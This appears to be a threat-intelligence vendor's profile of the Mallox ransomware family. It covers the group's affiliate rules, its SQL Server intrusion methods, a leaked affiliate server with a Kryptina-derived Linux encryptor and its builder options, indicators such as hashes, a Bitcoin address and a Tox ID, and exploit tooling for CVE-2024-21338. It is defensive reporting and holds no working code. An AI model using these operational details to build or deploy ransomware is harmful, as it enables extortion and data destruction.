Mallox
Mallox is an enterprise-focused ransomware family and ransomware-as-a-service (RaaS) operation that emerged in 2021. It is also referred to in the provided content as TargetCompany, FARGO, XOLLAM, and BOZON, though Mallox is the most widely used name. The operation reportedly began as a private group and launched an affiliate program in 2022. Its recruitment was selective: it sought Russian-speaking affiliates, excluded English-speaking affiliates and novices, instructed affiliates to target organizations with at least $10 million in revenue, and to avoid hospitals and educational institutions. The content states Mallox had 16 active affiliates in 2023, with eight of those original affiliates still active in 2024 and no newcomers.
The malware is associated with enterprise attacks and big-game-hunting style targeting. The content states Mallox operators are known to exploit timely vulnerabilities, including Microsoft SQL Server flaws, and also use brute-force attacks for initial access. Separate reporting in the content describes WeaXor/Weaxor as a modified version or rebrand of Mallox, and notes Mallox activity associated with exploiting insecure Microsoft SQL servers.
A May 2024 leak from a Mallox affiliate staging server provided detailed insight into one affiliate’s tooling. According to the content, that affiliate’s Linux ransomware, branded "Mallox v1.0," was built from a modified version of the open-source Kryptina Linux RaaS platform. This Kryptina-derived Mallox Linux variant retained Kryptina’s core encryption and decryption routines, source structure, web interface, and builder components, with most changes limited to rebranding, translated documentation, and minor edits. The Linux variant used AES-256-CBC for file encryption, retained the krptna_process_file() encryption routine using OpenSSL APIs, and preserved Kryptina-style XOR-plus-base64 obfuscation for keys and configuration data. The builder supported parameters including demo, debug, symbols, arch32, xor, jobs, persist, maxsize, and secdel; the secdel option enabled a secure deletion or wiper-like capability.
The leaked affiliate server was hosted at 185[.]73.125[.]6 and contained modified Kryptina source files, a web interface, builder infrastructure, ransom note templates, and target-specific output folders. The content says 14 victim/output subfolders were present, with seven containing config.json files and compiled encryptor/decryptor binaries. Across those seven configured builds, the same Bitcoin address was used: 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3. They also shared the same encrypted-file extension, .lmallox, the same key value, smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=, and the same ransom amount of 500.0. Ransom note configurations included the Tox ID 290E6890D02FBDCD92659056F9A95D80854534A4D76EE5D3A64AFD55E584EA398722EC2D3697.
The same affiliate server also hosted broader intrusion tooling associated with Mallox operations, including Windows-focused droppers, a Kaspersky password reset utility, and exploit code for CVE-2024-21338, indicating support for payload delivery, beachhead establishment, and privilege escalation. Specific artifacts mentioned in the content include Application.jar (SHA1 5cf67c0a1fa06101232437bee5111fefcd8e2df4), which launched PowerShell to download a Mallox payload as id.exe (SHA1 0f1aea2cf0c9f2de55d2b920618a5948c5e5e119); KLAPR.ZIP / KLAPR.BAT (SHA1 43377911601247920dc15e9b22eda4c57cb9e743), identified as Kaspersky Lab AllProducts Password Reset v2.0; jre-8u401-windows-x64.exe (SHA1 dc3f98dded6c1f1e363db6752c512e01ac9433f3); Reader.lnk (SHA1 c20e8d536804cf97584eec93d9a89c09541155bc); and Java bytecode referencing grovik71.theweb[.]place. The x64 payload red.exe had SHA1 0f1aea2cf0c9f2de55d2b920618a5948c5e5e119 and was identical to id.exe and MSiedge.exe hosted on the same server.
The content also places Mallox in broader ransomware reporting, including observation in 2023 industrial-sector tracking and later reporting that WeaXor was a Mallox-derived or Mallox-rebranded strain. Overall, the provided material characterizes Mallox as a longstanding, enterprise-oriented ransomware family with affiliate-driven operations, known SQL-server-related intrusion activity, and at least one Linux branch derived from Kryptina.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Exploit code for CVE-2024-21338 is included as well. CVE-2024-21338 is a local privilege escalation flaw in Windows 10 and 11 where HVCI (Hypervisor-Protected Code Integrity) is enabled. This exploit is based on the proof-of-concept code provided in a writeup from Hakai Security. | Mallox ( aka TargetCompany ) ransomware is a longstanding, Enterprise-focused, RaaS. The family emerged in 2021 and is sometimes referred to as FARGO, XOLLAM, or BOZON, due to the extension appended to encrypted files in some variants.
Threat Details and IOCs Malware: ... Mallox ...
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Mallox ( aka TargetCompany ) ransomware is a longstanding, Enterprise-focused, RaaS. The family emerged in 2021 and is sometimes referred to as FARGO, XOLLAM, or BOZON, due to the extension appended to encrypted files in some variants.
Techniques & procedures
14 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
2 techniques
Execution
Persistence
2 techniques
Persistence
Privilege Escalation
2 techniques
Privilege Escalation
Stealth
2 techniques
Stealth
Credential Access
1 technique
Credential Access
Discovery
2 techniques
Discovery
Command and Control
1 technique
Command and Control
Impact
1 technique
Impact
IOCs tracked for this family
35 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A ransomware family referenced as affiliated with an actor whose staging server leak exposed adaptations of Kryptina for enterprise attacks.
A ransomware variant first reported in 2021 that later launched an affiliate program in 2022. It follows a Big Game Hunting model with affiliate IDs, a TOR-hosted leak site, and targeting guidance focused on organizations with at least $10 million in revenue while excluding hospitals and educational institutions.
Ransomware family listed among malware observed/associated with React2Shell exploitation activity (no additional campaign detail provided in the content).
Named ransomware family referenced in the malware list; no additional details provided in the content.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.